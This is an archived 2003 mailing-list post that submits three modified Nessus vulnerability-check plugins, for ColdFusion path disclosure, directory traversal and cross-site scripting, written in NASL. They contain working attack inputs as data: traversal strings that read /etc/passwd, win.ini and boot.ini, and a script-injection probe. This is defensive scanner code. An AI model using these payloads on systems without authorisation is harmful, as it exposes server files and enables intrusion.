Hi, 11393 ColdFusion Path Disclosure - Output now includes the discovered web root 10297 Web traversal - Output now includes example exploit URL 10815 Cross Site Scripting - Output now includes example exploit URL Paul -- Paul Johnston Internet Security Specialist Westpoint Limited Albion Wharf, 19 Albion Street, Manchester, M1 5LN England Tel: +44 (0)161 237 1028 Fax: +44 (0)161 237 1031 email: paulat_private web: www.westpoint.ltd.uk # # This script was written by Renaud Deraison <deraisonat_private> # Modified by Paul Johnston for Westpoint Ltd to display the web root # # See the Nessus Scripts License for details # desc["english"] = " It is possible to make the remote web server disclose the physical path to its web root by requesting a MS-DOS device ending in .dbm (as in nul.dbm). Solution : The vendor suggests turning on 'Check that file exists' : Windows 2000: 1. Open the Management console 2. Click on 'Internet Information Services' 3. Right-click on the website and select 'Properties' 4. Select 'Home Directory' 5. Click on 'Configuration' 6. Select '.cfm' 7. Click on 'Edit' 8. Make sure 'Check that file exists' is checked 9. Do the same for '.dbm' Risk factor : Low The web root is : "; if(description) { script_id(11393); name["english"] = "ColdFusion Path Disclosure"; script_name(english:name["english"]); script_version ("$Revision: 1.4 $"); script_cve_id("CVE-2002-0576"); script_bugtraq_id(4542); script_description(english:desc["english"]); summary["english"] = "Checks for a ColdFusion vulnerability"; script_summary(english:summary["english"]); script_category(ACT_GATHER_INFO); script_copyright(english:"This script is Copyright (C) 2003 Renaud Deraison", francais:"Ce script est Copyright (C) 2003 Renaud Deraison"); family["english"] = "CGI abuses"; family["francais"] = "Abus de CGI"; script_family(english:family["english"], francais:family["francais"]); script_dependencie("find_service.nes", "no404.nasl"); script_require_ports("Services/www", 80); exit(0); } include("http_func.inc"); include("http_keepalive.inc"); # # The script code starts here # port = get_kb_item("Services/www"); if(!port) port = 80; if(!get_port_state(port))exit(0); req = http_get(item:"/nul.dbm", port:port); res = http_keepalive_send_recv(port:port, data:req); webroot = eregmatch(pattern:"([A-Z]:\\[^<>]+\\)nul.dbm", string:res); if(!isnull(webroot)) { security_warning(port:port, data:string(desc["english"], webroot[1])); } # # This script was written by Renaud Deraison <deraisonat_private> # And hacked three years later by Michel Arboi... # # See the Nessus Scripts License for details # ############## # References: ############## # Message-ID: <057801c26b19$529b2950$c64896d4@beyondmobile1> # Date: Thu, 3 Oct 2002 22:12:31 +0200 # From: "Aviram Jenik" <aviramat_private> # Subject: BearShare Directory Traversal Issue Resurfaces # To: win2ksecadviceat_private # # Date: 25 Sep 2002 09:10:45 -0000 # Message-ID: <20020925091045.29313.qmailat_private> # From: "DownBload" <downbloadat_private> # To: bugtraqat_private # Subject: IIL Advisory: Reverse traversal vulnerability in Monkey (0.1.4) HTTP server # # From: "David Endler" <dendlerat_private> # To:vulnwatchat_private # Date: Mon, 23 Sep 2002 16:41:19 -0400 # Subject: iDEFENSE Security Advisory 09.23.2002: Directory Traversal in Dino's Webserver # # From:"UkR security team^(TM)" <cuctemaat_private> # Subject: advisory # To: bugtraqat_private # Date: Thu, 05 Sep 2002 16:30:30 +0400 # Message-ID: <web-29288022at_private> # # From: "Tamer Sahin" <tsat_private> # To: bugtraqat_private # Subject: Web Server 4D/eCommerce 3.5.3 Directory Traversal Vulnerability # Date: Tue, 15 Jan 2002 00:36:26 +0200 # Affiliation: http://www.securityoffice.net # # From: "Alex Forkosh" <aforkoshat_private> # To: bugtraqat_private # Subject: Viewing arbitrary file from the file system using Eshare Expressions 4 server # Date: Tue, 5 Feb 2002 00:18:42 -0600 # # Should also apply for BID 7308, 7378, 7362, 7544, 7715 # # From: "mattmurphyat_private" <mattmurphyat_private> # Subject: Zeroo Folder Traversal Vulnerability # To: newsat_private, vulnwatchat_private, bugtraqat_private # Date: Thu, 21 Nov 2002 19:49:46 -0500 # Reply-To: mattmurphyat_private # # From: supportat_private # Subject: [NEWS] Remote Console Applet Allows Remote File Retrieval # To: listat_private # Date: 15 Dec 2002 23:17:34 +0200 # desc["english"] = " It is possible to read arbitrary files on the remote server by prepending ../../ or ..\..\ in front on the file name. Solution : Use another web server Risk factor : High Example exploit URL : "; if(description) { script_id(10297); script_version ("$Revision: 1.27 $"); name["english"] = "Web server traversal"; name["francais"] = "Web server traversal"; script_name(english:name["english"], francais:name["francais"]); desc["francais"] = "Il est possible de lire n'importe quel fichier sur la machine distante en ajoutant des points devant leur noms, tels que ../../ ou ..\..\. Solution : désactivez ce service et installez un vrai serveur web. Facteur de risque : Elevé"; script_description(english:desc["english"], francais:desc["francais"]); summary["english"] = "\..\..\file.txt"; summary["francais"] = "\..\..\file.txt"; script_summary(english:summary["english"], francais:summary["francais"]); script_category(ACT_ATTACK); script_copyright(english:"This script is Copyright (C) 1999 Renaud Deraison", francais:"Ce script est Copyright (C) 1999 Renaud Deraison"); family["english"] = "CGI abuses"; family["francais"] = "Abus de CGI"; script_family(english:family["english"], francais:family["francais"]); script_dependencie("find_service.nes", "no404.nasl", "httpver.nasl"); script_require_ports("Services/www", 80); exit(0); } # # The script code starts here # include("http_func.inc"); include("http_keepalive.inc"); port = get_kb_item("Services/www"); if(!port)port = 80; if(! get_port_state(port)) exit(0); qc=1; k = string("www/no404/", port); if (get_kb_item(k)) qc=0; i=0; r[i] = string("..\\..\\..\\..\\..\\..\\windows\\win.ini"); i=i+1; r[i] = string("..\\..\\..\\..\\..\\..\\winnt\\win.ini"); i=i+1; r[i] = "/%5c..%5c..%5c..%5cwindows%5cwin.ini"; i=i+1; r[i] = "/%5c..%5c..%5c..%5cwindows%5cwin%2eini"; i=i+1; r[i] = "/%5c%2e%2e%5c%2e%2e%5c%2e%2e%5cboot.ini"; i=i+1; r[i] = "/%2f..%2f..%2f..%2f..%2f..%2f..%2fwindows%2fwin.ini"; i=i+1; r[i] = "/%2f..%2f..%2f..%2f..%2f..%2f..%2fwinnt%2fwin.ini"; i=i+1; r[i] = string("/.|./.|./.|./.|./.|./.|./.|./winnt/win.ini"); i=i+1; r[i] = string("/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/winnt/win.ini"); i=i+1; r[i] = string("/.../.../.../.../.../.../.../.../.../winnt/win.ini"); i=i+1; r[i] = 0; for (i=0; r[i]; i=i+1) { if (check_win_dir_trav_ka(port: port, url: r[i], quickcheck: qc)) { exploit_url = string("http://", get_host_ip(), ":", port, r[i]); security_hole(port:port, data:string(desc["english"], exploit_url)); exit(0); } } i=0; r[i] = "../../../../../../etc/passwd"; i=i+1; r[i] = "/../../../../../../../../../etc/passwd"; i=i+1; r[i] = "//../../../../../../../../../etc/passwd"; i=i+1; r[i] = string("/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd"); i=i+1; r[i] = 0; for (i = 0; r[i]; i=i+1) { req = http_get(item: r[i], port:port); rc = http_keepalive_send_recv(port:port, data:req); if(rc == NULL ) exit(0); if(egrep(pattern:"root:.*:0:[01]:", string:rc)) { exploit_url = string("http://", get_host_ip(), ":", port, r[i]); security_hole(port:port, data:string(desc["english"], exploit_url)); exit(0); } } # this code was the "40x_cross_site.nasl" written by SecuriTeam and was modified # by CIRT.net (sqat_private) (with help from SecuriTeam) to check for multiple cross # site scripting vuls. # Update by Felix Huber - huberfelixat_private - 14.11.2001 # Update by Chris Sullo - sqat_private - 16.11.2001 # false positive fix by Andrew Hintz - http://guh.nu - 1.3.2002 # Update by rd: thanks to Andrew's remarks, HTTP headers are discared # Update by Chris Sullo - sqat_private - 06/27/2002 -- added .cfm test # # Covers BID 5305 / CVE CAN-2002-1060 # Covers BID 7353 desc["english"] = "The remote web server seems to be vulnerable to the Cross Site Scripting vulnerability (XSS). The vulnerability is caused by the result returned to the user when a non-existing file is requested (e.g. the result contains the JavaScript provided in the request). The vulnerability would allow an attacker to make the server present the user with the attacker's JavaScript/HTML code. Since the content is presented by the server, the user will give it the trust level of the server (for example, the trust level of banks, shopping centers, etc. would usually be high). Risk factor : Medium Solutions: . Allaire/Macromedia Jrun: - http://www.macromedia.com/software/jrun/download/update/ - http://www.securiteam.com/windowsntfocus/Allaire_fixes_Cross-Site_Scripting_security_vulnerability.html . Microsoft IIS: - http://www.securiteam.com/windowsntfocus/IIS_Cross-Site_scripting_vulnerability__Patch_available_.html . Apache: - http://httpd.apache.org/info/css-security/ . ColdFusion: - http://www.macromedia.com/v1/handlers/index.cfm?ID=23047 . General: - http://www.securiteam.com/exploits/Security_concerns_when_developing_a_dynamically_generated_web_site.html - http://www.cert.org/advisories/CA-2000-02.html Example exploit URL : "; if (description) { script_id(10815); script_bugtraq_id(5305, 7353, 7344, 8037); script_version("$Revision: 1.18 $"); script_name(english:"Web Server Cross Site Scripting"); script_description(english:desc["english"]); script_summary(english:"Determine if the remote host is vulnerable to Cross Site Scripting vulnerability"); script_category(ACT_GATHER_INFO); script_family(english:"Misc.", francais:"Divers"); script_copyright(english:"(c) 2001 SecuriTeam, modified by Chris Sullo and Andrew Hintz"); script_dependencie("find_service.nes", "httpver.nasl"); script_require_ports("Services/www", 80); exit(0); } # # The script code starts here # include("http_func.inc"); port = get_kb_item("Services/www"); if(!port)port = 80; dir[0] = ".jsp"; dir[1] = ".shtml"; dir[2] = ".thtml"; dir[3] = ".cfm"; dir[4] = ""; if(get_port_state(port)) { for (i = 0; dir[i] ; i = i + 1) { soc = http_open_socket(port); if(soc) { url = string("/<SCRIPT>alert('Vulnerable')</SCRIPT>", dir[i]); confirmtext = string("<SCRIPT>alert('Vulnerable')</SCRIPT>"); req = http_get(item:url, port:port); send(socket:soc, data:req); head = http_recv_headers(soc); r = http_recv(socket:soc); http_close_socket(soc); if(confirmtext >< r) { exploit_url = string("http://", get_host_ip(), ":", port, url); security_warning(port:port, data:string(desc["english"], exploit_url)); set_kb_item(name:string("www/", port, "/generic_xss"), value:TRUE); exit(0); } } else exit(0); } }
This archive was generated by hypermail 2b30 : Tue Sep 16 2003 - 06:42:52 PDT